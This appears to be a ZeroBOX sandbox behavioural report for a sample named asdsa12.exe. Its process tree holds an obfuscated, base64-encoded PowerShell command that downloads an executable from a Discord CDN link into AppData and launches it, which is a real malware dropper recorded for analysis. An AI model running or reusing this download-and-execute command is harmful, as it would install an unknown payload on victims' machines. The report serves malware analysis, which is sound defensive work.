| ZeroBOX

Behavioral Analysis

Process tree

  • asdsa12.exe "C:\Users\test22\AppData\Local\Temp\asdsa12.exe"

    2552
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYgBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQAxADkAMwAzADMANQA4ADUAMQAyADQAMgAyADkAOQAyAC8AMQAwADUAMQA5ADMANwA4ADQAOQAyADUANwAyADUAMAA4ADMAOAAvAEMAUgAuAGUAeABlACcALAAgADwAIwBkAGMAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGgAcQB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAdABlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAMQAzADEAMgAzAC4AZQB4AGUAJwApACkAPAAjAGoAcwBoACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAYQBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAHYAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyADEAMwAxADIAMwAuAGUAeABlACcAKQA8ACMAbQBkAGsAIwA+AA=="

      2700

Process contents

No process loaded Click on a process in the tree above to load its data.